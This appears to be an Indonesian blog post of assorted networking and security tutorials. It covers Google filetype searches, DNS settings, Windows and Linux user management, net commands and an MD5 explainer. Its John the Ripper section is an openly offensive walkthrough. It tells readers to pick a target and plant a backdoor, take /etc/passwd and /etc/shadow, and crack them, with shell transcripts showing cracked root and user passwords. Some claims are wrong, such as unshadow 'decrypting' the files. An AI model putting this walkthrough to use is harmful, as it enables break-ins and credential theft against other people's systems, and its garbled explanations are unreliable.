Cara Melakukan Pencarian File Tipe Tertentu Melalui Google

File Tipe Pdf

Untuk melakukan percarian file tipe pdf dengan menggunakan google kita dapat mengetikkan “<nama file yang dicari> <filetype : pdf>”

Contoh :

Nama file yang dicari : firewall

Buka google, lalu ketik di pencarian google “firewall filetype : pdf”

Maka hasilnya seperti dibawah ini file tentang “firewall” yang  semuanya bertipe pdf

pdf

File Tipe xls

Untuk melakukan percarian file tipe xls dengan menggunakan google kita dapat mengetikkan “<nama file yang dicari> <filetype : xls>”

Contoh :

Nama file yang dicari : jadwal kuliah

Buka google, lalu ketik di pencarian google “jadwal kuliah filetype : xls”

Maka hasilnya seperti dibawah ini file tentang “jadwal kuliah” yang  semuanya bertipe xls

xls

File Tipe Mp3

Untuk melakukan percarian file tipe mp3 dengan menggunakan google kita dapat mengetikkan “<nama file yang dicari> <filetype : mp3>”

Contoh :

Nama file yang dicari : lagu

Buka google, lalu ketik di pencarian google “jadwal kuliah filetype : mp3”

Maka hasilnya seperti dibawah ini file tentang “lagu” yang  semuanya bertipe mp3

mp3

Proxy Server Google & Nawala

Cara Setting DNS Nawala

Buka control panel –> Network and sharing Center

control panel

connection

klik pada koneksi aktif —>  Connection Indonesia 3

propertis

Klik Propertis

tcpipv4

Pilih internet Protocol Version 4 (TCP/IPv4) —>  propertis

Pilih Use the following DNS server addresses

Isi preferred DNS server : 180.131.144.144 dan Alternate DNS server : 180.131.145.145

nawala

Klik OK

Jika sukses maka akan muncul gambar seperti berikut jika kita membuka situs yang di blokir oleh nawala :

situs

Setting DNS Google

Untuk melakukan setting DNS Google lakukan cara yang sama seperti di atas isi preferred DNS server : 8.8.8.8 & Alternate DNS server : 8.8.4.4 seperti dibawah ini:

dns

Software John The Ripper

John The Ripper adalah untuk mendeteksi kelemahan password pada sistem UNIX (termasuk Linux). John The Ripper merupakan program yang dapat membantu administrator menentukan kelayakan suatu password. Namun John The Ripper juga digunakan oleh pihak-pihak yang tidak berkepentigan untuk mendapatkan password seorang user. Situs resmi John The Ripper berada di www.openwall.com/john

John The Ripper adalah tools untuk mengcrack yang opensource paling popular di dunia dan telah dirancang khusus untuk mengcrack sebanyak mungkin password dalam waktu yang sangat singkat.

Cara Menggunakan :

Pertama-tama carilah sebuah target yang kalian suka lalu terserah cara kalian untuk memasang backdoor.
Carilah file “passwd” dan “shadow”,biasanya letak passwd dan shadow ada di /etc/passwd dan /etc/shadow lalu terserah kalian mau diupload atau dikerjakan dalam shell file “passwd” dan “shadow” untuk dicrack.

sekarang go to the point :
[root@D-and~ tmp]# wget

http://www.openwall.com/john/f/john-1.7.2.tar.gz

[root@D-and~ tmp]# ls
. radsess.13217 radsess.15352 radsess.26504
.. radsess.13221 radsess.15377 radsess.26508
.bash_history radsess.13252 radsess.15505 radsess.26516
.bash_logout radsess.13257 radsess.15509 radsess.26520
.bash_profile radsess.13261 radsess.15510 radsess.29908
.bashrc radsess.13262 radsess.15517 radsess.29909
.emacs radsess.13269 radsess.15521 radsess.29935
.gtkrc radsess.13273 radsess.15525 radsess.29940
.kde radsess.13277 radsess.15627 radsess.29946
.screenrc radsess.13278 radsess.15631 radsess.30573
.webmin radsess.13287 radsess.15632 radsess.30577
john-1.72.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585
[root@D-and~ tmp]# tar -zxvf john-1.72.tar.gz
john-1.72/src/AFS_fmt.c
john-1.72/src/BF_fmt.c
john-1.72/src/BF_std.c
john-1.72/src/BSDI_fmt.c
john-1.72/src/DES_bs.c



john-1.72/doc/OPTIONS
john-1.72/doc/README
john-1.72/doc/RULES
john-1.72/README
udah selesai dicompile kita cek

[root@D-and~ tmp]# ls
[root@D-and~ tmp]# ls
. radsess.13213 radsess.15348 radsess.26500
.. radsess.13217 radsess.15352 radsess.26504
.bash_history radsess.13221 radsess.15377 radsess.26508
.bash_logout radsess.13252 radsess.15505 radsess.26516
.bash_profile radsess.13257 radsess.15509 radsess.26520
.bashrc radsess.13261 radsess.15510 radsess.29908
.emacs radsess.13262 radsess.15517 radsess.29909
.gtkrc radsess.13269 radsess.15521 radsess.29935
.kde radsess.13273 radsess.15525 radsess.29940
.screenrc radsess.13277 radsess.15627 radsess.29946
.webmin radsess.13278 radsess.15631 radsess.30573
john-1.72 radsess.13287 radsess.15632 radsess.30577
john-1.72.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585

[root@D-and~ tmp]# cd john-1.72
[root@D-and~ john-1.72]

setelah kita masuk…kita langsung cari folder src
[root@D-and~ john-1.72]# ls
. .. README doc run src
[root@D-and~ john-1.72]# cd src
[root@D-and~ src]# ls
. alpha.h formats.h mips32.h single.c
.. batch.c getopt.c mips64.h single.h
AFS_fmt.c batch.h getopt.h misc.c sparc.S
………
………
Makefile detect.c math.c rules.c x86-mmx.h
Makefile.dep external.c math.h rules.h x86.S
alpha-4k.h external.h memory.c signals.c
alpha.S formats.c memory.h signals.h

lalu kita compile dulu, dan lihat jenis mesin yang ada

[root@D-and~ src]# make
To build John the Ripper, type:
make SYSTEM
where SYSTEM can be one of the following:
linux-x86-any-elf Linux, x86, ELF binaries
linux-x86-mmx-elf Linux, x86 with MMX, ELF binaries
….
….
win32-cygwin-x86-mmx Win32, Cygwin, x86 with MMX
win32-cygwin-x86-k6 Win32, Cygwin, AMD K6
generic Any other UNIX system with gcc

[root@D-and~ src]# make generic
[root@D-and~ src]# rm -f arch.h
[root@D-and~ src]# gcc -c -Wall -O2 -fomit-frame-pointer detect.c
[root@D-and~ src]# gcc -s detect.o -o detect
[root@D-and~ src]# ./best.sh “make” “DES_fmt.o DES_std.o” “MD5_std.o” “BF_std.o”
Compiling: DES benchmark (code version #1)
make[1]: Entering directory `/tmp/john-1.72/src’
[root@D-and~ src]# gcc -c -Wall -O2 -fomit-frame-pointer -funroll-loops DES_bs.c
[root@D-and~ src]# sed “s/unsigned long/ARCH_WORD/” nonstd.c > DES_bs_s.c


sampai muncul kata /run/unshadow
sampai muncul kata /run/unique
sampai muncul kata /run/unafs

Selain itu kalian juga bisa dapatkan John The Ripper yang sudah di compile, tapi penulis tidak menyediakan JTR yang sudah di compile [carilah sendiri yang sudah di compile ]

Sehabis itu kita menuju ke folder run di direktory.
[root@D-and~ src]# cd ..
[root@D-and~ john-1.72]# cd run
[root@D-and~ run]# ls
. digits.chr lanman.chr unshadow
.. john mailer unafs
alpha.chr john.pot passwd.1st unique

kaya gitu lah kira2 munculnya )

setelah itu kita cari letak passwd dan shadow
[root@D-and~ run]# whereis passwd
passwd: /usr/bin/passwd /etc/passwd /etc/passwd.OLD
/usr/share/man/man1/passwd.1.gz
/usr/share/man/man5/passwd.5.gz
kemudian gunakan cara yang sama untuk mencari file shadow ~ penulis telah mencoba beberapa shell dan memang letak passwd dan shadow di /etc/passwd dan /etc/shadow. File passwd emang bisa diread oleh siapa saja, sedang file shadow tidak bisa..diperlukan access root untuk mengambil 2 data tersebut, sebab file passwd dan shadow telah diencrypt.

sekarang kita masuk ke tahap untuk mendecrypt password, alias “CRACK PASSWORD”
[root@D-and~ run]# ./unshadow /etc/passwd /etc/shadow > passwd.1

maksudnya file passwd dan shadow di decrypt menjadi 1 file bernama passwd.1

[root@D-and~ run]# cat passwd.1
root:$1$??A5?wMG$MtD3gClDSs2//g6b.Ri/a/:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin/nologin
daemon:*:2:2:daemon:/sbin:/sbin/nologin
adm:*:3:4:adm:/var/adm:/sbin/nologin
lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
….
johnl:$1$fWkgxJYA$7DP..k060XiXpfLlQThFd/:504:500::/home/johnl:/bin/bash
chrisl:$1$AaSlFOUP$yoCJ2ZvqvDjwxLl0SkTAQ.:505:500::/home/chrisl:/bin/bash
turner:$1$p.lFHE.e$12uUTK3WMSRa.4Hgm15Ti/:506:506::/home/turner:/bin/bash
williams:$1$0egmDfIs$Bqes1nBH9vYBf6yXAUKFQ0:507:500::/home/williams:/bin/bash
Setelah itu kita jalankan berbagai macam perintah Paman John contohnya :

Keterangan meng-Crack Password yang sudah di decrypt :

1. menggunakan -i:alpha
[root@D-and~ run]# ./john -i:alpha passwd.1 &
maksudnya kita crack passwd.1 dan disimpan dibackground, jadi tinggalin aja selama paman john mengcrack password untuk kita, kita bisa ngeroot ntar dia muncul kaya gini kalo berhasil
[root@D-and~ run]# ./john -i:alpha passwd.1 &
Loaded 2 passwords with 2 different salts (Standard DES [24/32 128K])
watson (root)
johnl (summer)

2. menggunakan -single
[root@D-and~ run]# /john -single passwd.2

3. kita ingin mengecrack password root / user saja

[root@D-and~ run]# ./john -i:alpha -user:0 passwd.1

atau

[root@D-and~ run]# ./john -i:alpha -user:500 passwd.1

untuk mengecek hasil password yang kita crack, dapat menggunakan

[root@D-and~ run]# ./john -show passwd.1
[root@D-and~ run]# ./john -show passwd.3
root:watson:0:0:root:/root:/bin/bash
coda:tools:500:500:CODA Manager:/home/coda:/bin/bash
adam:myrtle:501:500::/home/adam:/bin/bash
herschel:chester:502:500::/home/herschel:/bin/bash
johnl:summer:504:500::/home/johnl:/bin/bash
chrisl:turtle:505:500::/home/chrisl:/bin/bash
turner:account:506:506::/home/turner:/bin/bash
williams:ronald:507:500::/home/williams:/bin/bash

passwords cracked, 1 left artinya user root memiliki password watson
user coda memiliki password tools
user adam memiliki password myrtle

Cara Mengatur Hak Akses Pada Windows

  • Klik Control Panel -> Pilih User Account
  • Setelah masuk jendela user Accounts yang tampil hanya logo adminstrator saja, bila kita ingin tampilkan list user yang ada dalam dalam sebuah unit PC atau Laptop maka kita pilih Manage another account.
  • Terlihat tampilan logo administrator dan user tapi itu belum kita perlukan lihat. Klik 2 kali di Set up Parental Controls dibawah tulisan additional things you can do. 
  • Kemudian pilih accunt yang akan dibatasi hak accesnya, dan aktifkan parental controlnya
  • Setting sesuai dengan yang anda inginkan

Kegunaan Net View,Net User, Net Group & Net localgroup

Net View  : untuk menampilkan informasi

Contoh :

net view \\computername
menampilkan informasi share windows

Net Use : untuk menghubungkan atau memutus komputer  dari sumber daya bersama atau menampilkan informasi tentang koneksi .

 Net User  : untuk menambah user account atau menampilkan informasi tentang user account/account pengguna.

Contoh :

net user ditta rajin /add
menambahkan account ditta dengan password rajin

net user ditta
menampilkan informasi account ditta

Net Group : menampilkan daftar semua group pada server local

Contoh :

net group exec /add
manmbahkan grup dengan nama exec

Net localgroup: untuk menampilkan daftar group yang ada

Contoh :

net localgroup TelnetClients /add
menambahkan group TelnetCliets, yaitu grup mana yang bisa melakukan telnet.

Add User dan Group pada OS Linux Ubuntu

Cara Add User :

Langkah pertama kali membuat user kita masuk ke terminal, caranya adalah :

  1. Buka Terminal
  2. Selanjutnya ketik sudo adduser <nama user yang diinginkan>, tunggu proses setelah itu akan muncul kata-kata Enter new UNIX password :(masukkan password yg anda inginkan) dan Retype new UNIX password :(masukkan password yg anda inginkan). Setelah itu isi nama Full Name [] : ( nama user yang diinginkan). Lalu Enter. Pada Is The information corret? [Y/n], Ketiklah Y.
  3.  Ketik Sudo adduser user1

terminal

Selanjutnya untuk melihat user kita sudah masuk atau belum user tersebut, ketik cat/ etc/passwd.

Cara Mambuat Group :

Langkah pertama membuat user kita masuk ke terminal

  1. Buka terminal
  2. Ketik groupadd <namagroup>
  3. Ketik sudo groupadd group1
    selanjutnya untuk melihat hasil group yang sudah di buat maka ketik cat/etc/group

Enkripsi MD5

Enkripsi adalah suatu metode yang digunakan untuk mengkodekan data sedemikian rupa sehingga keamanan informasinya terjaga dan tidak dapat dibaca tanpa di dekripsi (kebalikan dari proses enkripsi) dahulu. Encryption berasal dari bahasa yunani kryptos yang artinya tersembunyi atau rahasia. 

Dikarenakan enkripsi telah digunakan untuk mengamankan komunikasi di berbagai negara, hanya organisasi-organisasi tertentu dan individu yang memiliki kepentingan yang sangat mendesak akan kerahasiaan yang menggunakan enkripsi. Di pertengahan tahun 1970-an, enkripsi kuat dimanfaatkan untuk pengamanan oleh sekretariat agen pemerintah Amerika Serikat pada domain publik, dan saat ini enkripsi telah digunakan pada sistem secara luas, seperti Internet e-commerce, jaringan Telepon bergerak dan ATM pada bank.

Enkripsi dapat digunakan untuk tujuan keamanan, tetapi teknik lain masih diperlukan untuk membuat komunikasi yang aman, terutama untuk memastikan integritas dan autentikasi dari sebuah pesan. Contohnya, Message Authentication Code (MAC) atau digital signature. Penggunaan yang lain yaitu untuk melindungi dari analisis jaringan komputer.

Manfaat Enkripsi 

  1. Beberapa manfaat yang bisa didapatkan dari enkripsi ini adalah :
  2. Kerahasiaan suatu informasi terjamin
  3. Menyediakan authentication dan perlindungan integritas pada algoritma checksum/hash
  4. Menanggulangi penyadapan telepon dan email
  5. Untuk digital signature. Digital signature adalah menambahkan suatu baris statemen pada suatu elektronik copy dan mengenkripsi statemen tersebut dengan kunci yang kita miliki dan hanya pihak yang memiliki kunci dekripsinya saja yang bisa membukanya.
  6. Untuk digital cash

 

Kerugian Enkripsi

Penyalahgunaan dan kerugian dari enkripsi adalah:

  1. Penyandian rencana teroris
  2. Penyembunyian record criminal oleh seorang penjahat
  3. Pesan tidak bisa dibaca bila penerima pesan lupa atau kehilangan kunci (decryptor).

 

ENKRIPSI MD5

Dalam kriptografiMD5 (Message-Digest algortihm 5) ialah fungsi hash kriptografik yang digunakan secara luas dengan hash value 128-bit. Pada standart Internet (RFC 1321), MD5 telah dimanfaatkan secara bermacam-macam pada aplikasi keamanan, dan MD5 juga umum digunakan untuk melakukan pengujian integritas sebuah berkas.

MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996, sebuah kecacatan ditemukan dalam desainnya, walau bukan kelemahan fatal, pengguna kriptografi mulai menganjurkan menggunakan algoritma lain, seperti SHA-1 (klaim terbaru menyatakan bahwa SHA-1 juga cacat). Pada tahun 2004, kecacatan-kecacatan yang lebih serius ditemukan menyebabkan penggunaan algoritma tersebut dalam tujuan untuk keamanan jadi makin dipertanyakan.

Hash-Hash MD5

Hash-hash MD5 sepanjang 128-bit (16-byte), yang dikenal juga sebagai ringkasan pesan, secara tipikal ditampilkan dalam bilangan heksadesimal 32-digit. Berikut ini merupakan contoh pesan ASCII sepanjang 43-byte sebagai masukan dan hash MD5 terkait:

MD5("The quick brown fox jumps over the lazy dog") = 9e107d9d372bb6826bd81d3542a419d6

Bahkan perubahan yang kecil pada pesan akan (dengan probabilitas lebih) menghasilkan hash yang benar-benar berbeda, misalnya pada kata “dog”, huruf d diganti menjadic:

MD5("The quick brown fox jumps over the lazy cog") = 1055d3e698d289f2af8663725127bd4b

Hash dari panjang-nol ialah:

MD5("") = d41d8cd98f00b204e9800998ecf8427e

 

Algoritma:
MD5 proses pesan variabel-panjang menjadi output sepanjang 128 bit. Pesan masukan dipecah menjadi potongan 512-bit blok (enam belas 32-bit little endian integer) pesan sehingga panjangnya dibagi oleh 512. Padding bekerja sebagai berikut: bit tunggal pertama, 1, ditambahkan ke akhir pesan. Hal ini diikuti oleh nol sebanyak yang diperlukan untuk membawa panjang pesan hingga 64 bit kurang dari kelipatan 512. Bit sisanya diisi dengan integer 64-bit yang mewakili panjang pesan asli dalam bit.
Algoritma MD5 utama beroperasi pada kondisi 128-bit, dibagi menjadi empat kata 32-bit, dinotasikan A, B, C dan D. Ini diinisialisasi ke konstanta tetap tertentu. Algoritma utama kemudian beroperasi pada masing-masing blok pesan 512-bit pada gilirannya, setiap blok memodifikasi bagiannya. Pengolahan blok pesan terdiri dari empat tahap yang sama, setiap putaran terdiri dari 16 operasi serupa berdasar pada fungsi F non-linear, penambahan modular, dan rotasi kiri.